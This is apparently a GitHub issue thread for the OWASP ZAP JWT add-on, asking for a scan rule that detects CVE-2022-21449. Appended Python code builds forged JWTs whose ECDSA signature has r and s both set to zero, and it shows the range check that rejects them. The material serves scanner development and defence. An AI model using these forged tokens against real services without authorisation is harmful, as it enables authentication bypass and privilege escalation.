owasp-zap-jwt-addon
Add support for Java Vuln? (CVE-2022-21449)
Is your feature request related to a problem? Please describe.
It would be great if the JWT add-on could check for JWT issues related to CVE-2022-21449.

Describe the solution you'd like
Implement a scan rule/check that can detect something similar to: https://twitter.com/christophetd/status/1516878071785467904
Sample Vulnerable Application of the JWT Null Signature Vulnerability (CVE-2022-21449)

Describe alternatives you've considered
N/A

Would you like to help fix this issue?
Not at this time.

Additional context
Nothing further.
Hi, I'd like to work on this issue. If I understand correctly, I must verify that the ECDSA signature has r != 0 and s != 0, and if r = s = 0 then the signature isn't accepted.
Hi @snowatlas,
Great!!! Yes, you are right. We need to inject the payloads where r and s are 0 for ECDSA.
Thanks, Karan
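The probe discussed in the two comments above (inject a JWT whose ECDSA signature has r = s = 0) and the range check a correct verifier applies, as an added example that is not part of the original issue and not the add-on's code. It uses only the Python standard library. The curve orders are the published NIST P-256/P-384/P-521 values; the sample token is constructed here to stand in for one captured from the target. The raw `r||s` encoding is the JWS form (RFC 7518, section 3.4); the DER form `3006020100020100` is included as a second payload on the assumption that some Java verifiers consume DER directly, as in the public demo linked in the issue.

```python
"""
Build the CVE-2022-21449 probe tokens a scan rule would inject (ECDSA
signature with r = s = 0) and show the [1, n-1] range check a verifier
must apply before accepting an (r, s) pair. Illustrative, stdlib only.
"""
import base64
import json

# Order n of the NIST curves behind the JWS ES* algorithms (FIPS 186-4 / SEC 2).
CURVE_ORDER = {
    "ES256": 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551,
    "ES384": 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFC7634D81F4372DDF581A0DB248B0A77AECEC196ACCC52973,
    "ES512": int("01" + "F" * 65 + "A51868783BF2F966B7FCC0148F709A5D03BB5C9B8899C47AEBB6FB71E91386409", 16),
}
# Byte length of each of r and s in a raw JWS signature (RFC 7518, section 3.4).
COORD_BYTES = {"ES256": 32, "ES384": 48, "ES512": 66}

# DER encoding of SEQUENCE { INTEGER 0, INTEGER 0 }: the shape Java's Signature
# API consumes. Assumed second payload for verifiers that take DER directly.
DER_ZERO_SIGNATURE = bytes.fromhex("3006020100020100")


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def null_signature_probes(token: str, alg: str = "ES256") -> list:
    """Return the tokens to inject: same payload, an ES* header, and a
    signature whose r and s are both zero (raw and DER encodings)."""
    header_b64, payload_b64, _ = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") not in COORD_BYTES:
        header["alg"] = alg  # not an ECDSA token: the probe picks the algorithm
    alg = header["alg"]
    header_b64 = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    raw_zero = bytes(2 * COORD_BYTES[alg])  # r = 0 and s = 0 as fixed-width big-endian
    return [f"{header_b64}.{payload_b64}.{b64url_encode(sig)}"
            for sig in (raw_zero, DER_ZERO_SIGNATURE)]


def decode_rs(sig: bytes, alg: str) -> tuple:
    """Split a JWS ECDSA signature into (r, s); accepts raw r||s or DER."""
    size = COORD_BYTES[alg]
    if len(sig) == 2 * size:
        return int.from_bytes(sig[:size], "big"), int.from_bytes(sig[size:], "big")
    if sig[:1] == b"\x30":  # DER SEQUENCE of two INTEGERs
        body = sig[2:2 + sig[1]]
        if body[:1] != b"\x02":
            raise ValueError("bad DER signature")
        r_len = body[1]
        r = int.from_bytes(body[2:2 + r_len], "big")
        rest = body[2 + r_len:]
        if rest[:1] != b"\x02":
            raise ValueError("bad DER signature")
        s = int.from_bytes(rest[2:2 + rest[1]], "big")
        return r, s
    raise ValueError("unexpected signature length")


def signature_in_range(r: int, s: int, alg: str) -> bool:
    """The check CVE-2022-21449 skipped: r and s must both lie in [1, n-1].
    A verifier rejects here, before any curve arithmetic is attempted."""
    n = CURVE_ORDER[alg]
    return 1 <= r < n and 1 <= s < n


def token_signature_in_range(token: str) -> bool:
    """True only if the token's (r, s) would pass the range check."""
    header_b64, _, sig_b64 = token.split(".")
    alg = json.loads(b64url_decode(header_b64))["alg"]
    r, s = decode_rs(b64url_decode(sig_b64), alg)
    return signature_in_range(r, s, alg)


# Constructed sample token (HS256 header, dummy signature) standing in for one
# captured from the application under test.
SAMPLE_TOKEN = (
    b64url_encode(b'{"alg":"HS256","typ":"JWT"}') + "."
    + b64url_encode(b'{"sub":"alice","admin":true}') + "."
    + b64url_encode(b"\x01" * 32)
)

if __name__ == "__main__":
    for probe in null_signature_probes(SAMPLE_TOKEN):
        print(probe, "-> passes range check:", token_signature_in_range(probe))
```

A scan rule would send each probe in place of the original token and flag the endpoint if the response matches the one obtained with the genuine token. A patched verifier rejects both probes at `signature_in_range` without ever computing s^-1 mod n.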